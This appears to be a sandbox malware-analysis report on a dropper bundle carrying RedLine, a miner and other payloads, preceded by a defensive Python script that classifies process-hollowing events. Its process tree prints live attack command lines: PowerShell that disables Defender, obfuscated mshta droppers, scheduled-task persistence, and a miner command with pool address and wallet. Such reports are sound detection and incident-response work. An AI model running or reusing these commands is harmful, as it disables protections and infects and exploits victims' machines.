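A classifier for rows of this kind, as an added example that is not code from the report or from Hatching Triage. It parses six of the rows above in the report's own format, labels each as self-hollowing, hollowing of a .NET host, hollowing of another trusted binary, or a cross-process write, and joins the target pid against the memory YARA matches so the hollowed child carrying RedLine is called out. The host-binary lists are assumptions; the YARA map holds the one match this report gives (pid 5412, family_redline).

```python
"""Classify SetThreadContext events as process-hollowing patterns.

Added example for the rows above; it is not code from the report or from
Hatching Triage. The sample rows are copied from the page in its
'PID <src> set thread context of <dst> <src> <process> <target process>'
shape; the host-binary lists are assumptions, and the YARA cross-reference
is taken from the RedLine Payload section of this report.
"""
import re
from typing import Dict, List, NamedTuple

# Trusted images that loaders start suspended and overwrite (assumed lists).
# The first group hosts .NET payloads (RedLine is written in C#).
DOTNET_HOSTS = {"applaunch.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
                "installutil.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe"}
OTHER_HOSTS = {"explorer.exe", "svchost.exe", "dllhost.exe", "notepad.exe"}

_ROW = re.compile(r"^PID (\d+) set thread context of (\d+) (\d+) (\S+) (\S+)$")


class Hollow(NamedTuple):
    src_pid: int
    dst_pid: int
    src_image: str
    dst_image: str
    pattern: str   # self-hollowing / dotnet-host / trusted-host / cross-process
    yara: str      # family rule matched in dst_pid's memory, or ""


def classify(src_image: str, dst_image: str) -> str:
    """Which hollowing pattern a source/target image pair represents."""
    s, d = src_image.lower(), dst_image.lower()
    if s == d:
        return "self-hollowing"      # suspended copy of the loader itself
    if d in DOTNET_HOSTS:
        return "dotnet-host"
    if d in OTHER_HOSTS:
        return "trusted-host"
    return "cross-process"


def parse_rows(lines: List[str], yara_hits: Dict[int, str]) -> List[Hollow]:
    events = []
    for line in lines:
        m = _ROW.match(line.strip())
        if m is None:
            raise ValueError(f"unrecognised row: {line!r}")
        src, dst, src_again, s_img, d_img = m.groups()
        if src != src_again:          # the repeated pid column must agree
            raise ValueError(f"pid mismatch in row: {line!r}")
        events.append(Hollow(int(src), int(dst), s_img, d_img,
                             classify(s_img, d_img), yara_hits.get(int(dst), "")))
    return events


def summary(events: List[Hollow]) -> Dict[str, List[int]]:
    """pattern -> target pids, i.e. the processes whose memory to dump."""
    groups: Dict[str, List[int]] = {}
    for e in events:
        groups.setdefault(e.pattern, []).append(e.dst_pid)
    return groups


# Six of the fourteen report rows.
SAMPLE_ROWS = [
    "PID 4544 set thread context of 2932 4544 Sat1624bfc23ff9f.exe Sat1624bfc23ff9f.exe",
    "PID 4900 set thread context of 5412 4900 Sat16066e28b50208.exe Sat16066e28b50208.exe",
    "PID 1628 set thread context of 5340 1628 Xf_zx9O1XjyURUhCmLjojbZL.exe AppLaunch.exe",
    "PID 3848 set thread context of 7964 3848 gcleaner.exe gcleaner.exe",
    "PID 35136 set thread context of 8624 35136 conhost.exe explorer.exe",
    "PID 12300 set thread context of 7004 12300 build.exe AppLaunch.exe",
]
# From "RedLine Payload": family_redline matched in the memory of pid 5412.
YARA_HITS = {5412: "family_redline"}

if __name__ == "__main__":
    for e in parse_rows(SAMPLE_ROWS, YARA_HITS):
        print(f"{e.src_image} ({e.src_pid}) -> {e.dst_image} ({e.dst_pid}): "
              f"{e.pattern} {e.yara}")
    print(summary(parse_rows(SAMPLE_ROWS, YARA_HITS)))
```

The target-pid list from summary() is the dump list: for a self-hollowed child the unpacked payload sits at the image base (the 0x400000 region in the RedLine match above), and for an AppLaunch.exe target the managed payload is what the host will run.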
Drops file in Program Files directory 18 IoCs
Processes (grouped by writer):
  J9zM_BwL31SvyQCz441NjFE2.exe
    File opened for modification   C:\Program Files (x86)\Company\NewProduct\cm3.exe
    File opened for modification   C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
    File opened for modification   C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
    File opened for modification   C:\Program Files (x86)\Company\NewProduct\inst2.exe
    File created                   C:\Program Files (x86)\Company\NewProduct\Uninstall.ini
  7PEDuinOLwXYX_6iGkQn8Cc8.exe
    File created                   C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
    File opened for modification   C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
  lakazet.exe
    File created   C:\Program Files (x86)\Windows NT\Camejogufu.exe
    File created   C:\Program Files (x86)\Windows NT\Camejogufu.exe.config
    File created   C:\Program Files (x86)\Windows Mail\Jaqewuvuhae.exe
    File created   C:\Program Files (x86)\Windows Mail\Jaqewuvuhae.exe.config
    File created   C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe
    File created   C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe.config
    File created   C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe
    File created   C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe.config
  Sat169c60f22b8.tmp
    File created                   C:\Program Files (x86)\FarLabUninstaller\unins000.dat
    File opened for modification   C:\Program Files (x86)\FarLabUninstaller\unins000.dat
    File created                   C:\Program Files (x86)\FarLabUninstaller\is-J7VNH.tmp
cm3.exe, jg1_1faf.exe and inst2.exe written here are executed later (pids 6592, 6572 and 6464 under "Executes dropped EXE"). lakazet.exe plants four executables, each with an .exe.config beside it (the .NET application configuration file, so these are managed binaries), inside directories that belong to Windows components and Office; two of them are the targets of its RunOnce "system recover" value. PowerControl_Svc.exe together with "Sets service image path in registry" suggests service-based persistence, although the service name is not shown here. The FarLabUninstaller files (unins000.dat, is-*.tmp) are Inno Setup's uninstaller bookkeeping, consistent with the .tmp helper process that wrote them.
Drops file in Windows directory 38 IoCs
Processes (grouped by writer):
  msiexec.exe (26)
    File created and opened for modification   C:\Windows\Installer\f77d9ae.msi
    File opened for modification   C:\Windows\Installer\MSIC6F9.tmp, MSI15BE.tmp, MSI7FFA.tmp, MSI7569.tmp, MSI29E5.tmp, MSI39C5.tmp, MSI7904.tmp, MSID775.tmp, MSIDB3E.tmp, MSI22DF.tmp, MSIF544.tmp, MSI1B8B.tmp, MSI356F.tmp, MSI877D.tmp, MSI877E.tmp, MSI6D59.tmp
    File opened for modification   C:\Windows\Installer\
    File created                   C:\Windows\Installer\inprogressinstallinfo.ipi
    File created                   C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}
    File opened for modification   C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
    File created                   C:\Windows\SystemTemp\~DFBD1AF643B10569D1.TMP, ~DF97FC8785AB81420C.TMP, ~DFB6DAF3930905E7B6.TMP, ~DF7E26EF0C798C8356.TMP
  svchost.exe (7)
    File opened for modification   C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log, DataStore\DataStore.edb, ReportingEvents.log, DataStore\DataStore.jfm, DataStore\Logs\edb.chk
    File opened for modification   C:\Windows\WindowsUpdate.log
    File created                   C:\Windows\System\xxx1.bak
  uNllGlcbm2GVjpyTbg93jDn7.exe (3)
    File created                   C:\Windows\System\xxx1.bak
    File created                   C:\Windows\System\svchost.exe
    File opened for modification   C:\Windows\System\svchost.exe
  WerFault.exe (1)
    File created                   C:\Windows\AppCompat\Programs\Amcache.hve.tmp
  MsiExec.exe (1)
    File created                   C:\Windows\Tasks\AdvancedWindowsManager #1.job
Most of this is noise from legitimate machinery: the Installer cache, the .ipi and SourceHash records (named after the product code {C845414C-903C-4218-9DE7-132AB97FDF62}) and ngen.log come from the MSI one payload installs, the SoftwareDistribution and WindowsUpdate.log writes are Windows Update running in the background, and Amcache.hve.tmp is Windows Error Reporting's own housekeeping. Two items matter. uNllGlcbm2GVjpyTbg93jDn7.exe creates C:\Windows\System\svchost.exe, a look-alike of the real service host in a legacy directory it does not live in, and the "svchost.exe" that then writes C:\Windows\System\xxx1.bak is consistent with that dropped copy rather than the System32 binary. MsiExec.exe writes C:\Windows\Tasks\AdvancedWindowsManager #1.job, a Task Scheduler 1.0 job file, which is persistence outside the Run keys listed above.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
The signature text is generic; no encryption or ransom-note activity appears elsewhere in this report, and the drive enumeration above comes from rvs.exe and the installers.
Program crash 30 IoCs
Processes (WerFault pid / crashed pid / crashed process):
  6396    5192    rundll32.exe
  6764    4552    Sat160ff2e199851.exe
  6892    5028    Sat1682c535a6fcb6e7.exe
  5992    3676    Sat16156abf9c.exe
  5784    1100    5X4Z1tG8vqSmImDuhk43ndKc.exe
  3276    2216    Worldoffer.exe
  4740    6564    ey4uvXWEOUalkU_eykdaluyu.exe
  4112    1628    Xf_zx9O1XjyURUhCmLjojbZL.exe
  3912    7040    chrome update.exe
  2108    5048    chrome1.exe
  7220    3568    7o86wFKJyInJIOUE8xaT8jW5.exe
  7164    6812    rundll32.exe
  7448    5028    LzmwAqmV.exe
  4552    2616    rGwY69WmOM_qqsBGjBQCwu70.exe
  4004    5288    WBGMEjP2ZOPhKrFm3D2PsxK2.exe
  7728    3532    I43HlxEfzYdBanh5sTg7Y_zX.exe
  1924    2396    B9fyo7QqeK801elsQ3zzApZx.exe
  2196    3560    UiCHUYf2DCZO0cVtFmpt1M5s.exe
  5684    6628    rundll32.exe
  7620    720     41QX82bYGlA3Bkj6dsFQtiUV.exe
  8080    2192    vg9O1s8jU7nNIaD25edzyuif.exe
  3568    8084    C292.exe
  10392   10244   rundll32.exe
  11152   8840    34D6.exe
  12560   12316   rundll32.exe
  13784   12300   build.exe
  13936   12232   ganfarm.exe
  16132   12040   D938.exe
  16776   16516   rundll32.exe
  19416   18908   srvs.exe
The crashed process is the second column. Pids are reused across the run: 5028 is listed as both Sat1682c535a6fcb6e7.exe and LzmwAqmV.exe, 1100 as 5X4Z1tG8vqSmImDuhk43ndKc.exe here and OblbIZVPY7a0tO5Oh7yjmZQL.exe elsewhere, and 4552 is a crashed Socelars component in one row and a WerFault.exe instance in another. A crash does not mean a stage did nothing: Xf_zx9O1XjyURUhCmLjojbZL.exe (1628), build.exe (12300) and ganfarm.exe (12232) had each already hollowed an AppLaunch.exe child when they crashed, so their payloads live on in those children.
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fBp6HqC0_TNfSR_tIpttHvQC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4BF9.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4BF9.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 4BF9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fBp6HqC0_TNfSR_tIpttHvQC.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | fBp6HqC0_TNfSR_tIpttHvQC.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2256 | schtasks.exe
2292 | schtasks.exe
5964 | schtasks.exe
5320 | schtasks.exe
6960 | schtasks.exe
-
Enumerates system info in registry 2 TTPs 63 IoCs
Processes:
-
Kills process with taskkill 8 IoCs
Processes:
pid | process
6320 | taskkill.exe
6792 | taskkill.exe
1604 | taskkill.exe
7336 | taskkill.exe
1700 | taskkill.exe
9340 | taskkill.exe
13648 | taskkill.exe
1340 | taskkill.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
-
Modifies registry class 7 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ |
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ |
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{F47242D6-599C-4903-A69D-0890AF561543} | Calculator.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ |
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{97D59D83-49ED-4351-8107-6E9CF1655674} | Calculator.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ |
-
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <blob data removed> | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <blob data removed> | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <blob data removed> | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = <blob data removed> | installer.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3208 8016 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pid | process
6316 | fBp6HqC0_TNfSR_tIpttHvQC.exe
9844 | 4BF9.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes:
-
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
pid | process
5456 | 7008547.exe
5432 | 4421256.exe
6472 | clip.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
-
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
pid | process
5268 | Sat169c60f22b8.tmp
932 | msedge.exe
6864 | installer.exe
11424 | client32.exe
15168 | Calculator.exe
19044 | rvs.exe
19492 | msiexec.exe
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid | process
7068 | cmd.exe
10320 | cmd.exe
14720 | cmd.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes (process tree: the number in parentheses is the entry's depth in the tree; each entry shows the image path, the command line and the behaviours flagged for it)

(1) C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    - Suspicious use of WriteProcessMemory

(2) C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

(3) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\setup_install.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
    - Suspicious use of WriteProcessMemory

(5) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    - Suspicious use of WriteProcessMemory

(5) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Sat16dbfd538b0b.exe
    - Suspicious use of WriteProcessMemory

(5) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16dbfd538b0b.exe
    Command line: Sat16dbfd538b0b.exe
    - Executes dropped EXE

(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Sat163af1aa81.exe

(5) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163af1aa81.exe
    Command line: Sat163af1aa81.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

(6) C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

(7) C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
    - Executes dropped EXE

(8) C:\Users\Admin\AppData\Roaming\5743283.exe
    Command line: "C:\Users\Admin\AppData\Roaming\5743283.exe"

(8) C:\Users\Admin\AppData\Roaming\7008547.exe
    Command line: "C:\Users\Admin\AppData\Roaming\7008547.exe"
    - Suspicious behavior: SetClipboardViewer

(8) C:\Users\Admin\AppData\Roaming\7646913.exe
    Command line: "C:\Users\Admin\AppData\Roaming\7646913.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

(8) C:\Users\Admin\AppData\Roaming\8412671.exe
    Command line: "C:\Users\Admin\AppData\Roaming\8412671.exe"
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

(8) C:\Users\Admin\AppData\Roaming\6766431.exe
    Command line: "C:\Users\Admin\AppData\Roaming\6766431.exe"

(9) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\6766431.exe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\6766431.exe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )

(10) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\6766431.exe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\6766431.exe" ) do taskkill /F /IM "%~nXm"

(11) C:\Windows\SysWOW64\taskkill.exe
    Command line: taskkill /F /IM "6766431.exe"
    - Kills process with taskkill

(8) C:\Users\Admin\AppData\Roaming\7933285.exe
    Command line: "C:\Users\Admin\AppData\Roaming\7933285.exe"

(7) C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
    - Executes dropped EXE

(8) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 296
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(7) C:\Users\Admin\AppData\Local\Temp\inst1.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\inst1.exe"

(7) C:\Users\Admin\AppData\Local\Temp\chrome.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\chrome.exe"

(7) C:\Users\Admin\AppData\Local\Temp\chrome update.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"

(8) C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -u -p 7040 -s 1724
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
(7) C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"

(8) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

(9) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"

(10) C:\Windows\SysWOW64\taskkill.exe
    Command line: taskkill -f -iM "search_hyperfs_206.exe"
    - Kills process with taskkill

(10) C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
    Command line: ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

(11) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )

(12) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

(11) C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )

(12) C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC

(13) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"

(13) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" EcHo "
    - Loads dropped DLL

(13) C:\Windows\SysWOW64\msiexec.exe
    Command line: msiexec -Y ..\lXQ2g.WC
    - Blocklisted process makes network request
    - Loads dropped DLL

(7) C:\Users\Admin\AppData\Local\Temp\setup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\setup.exe"

(7) C:\Users\Admin\AppData\Local\Temp\chrome1.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"

(8) C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -u -p 5048 -s 1724
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(7) C:\Users\Admin\AppData\Local\Temp\jingli-game.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\jingli-game.exe"

(7) C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
    - Loads dropped DLL

(7) C:\Users\Admin\AppData\Local\Temp\chrome2.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

(8) C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

(9) C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 260
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

(7) C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"

(8) C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"

(9) C:\Windows\System32\cmd.exe
    Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

(10) C:\Windows\system32\schtasks.exe
    Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
    - Creates scheduled task(s)

(9) C:\Windows\System32\cmd.exe
    Command line: "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"

(10) C:\Windows\System32\Conhost.exe
    Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger

(10) C:\Users\Admin\AppData\Roaming\services64.exe
    Command line: C:\Users\Admin\AppData\Roaming\services64.exe

(11) C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
    - Suspicious use of SetThreadContext

(12) C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

(13) C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "/sihost64"

(12) C:\Windows\explorer.exe
    Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
(4) C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c Sat162b769f285d4a78.exe

(5) C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat162b769f285d4a78.exe
    Command line: Sat162b769f285d4a78.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

(6) C:\Users\Admin\AppData\Roaming\6836899.exe
    Command line: "C:\Users\Admin\AppData\Roaming\6836899.exe"
    - Executes dropped EXE

(6) C:\Users\Admin\AppData\Roaming\856814.exe
    Command line: "C:\Users\Admin\AppData\Roaming\856814.exe"
    - Executes dropped EXE
    - Adds Run key to start application

(7) C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    Command line: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

(6) C:\Users\Admin\AppData\Roaming\7690304.exe
    Command line: "C:\Users\Admin\AppData\Roaming\7690304.exe"

(6) C:\Users\Admin\AppData\Roaming\5377420.exe
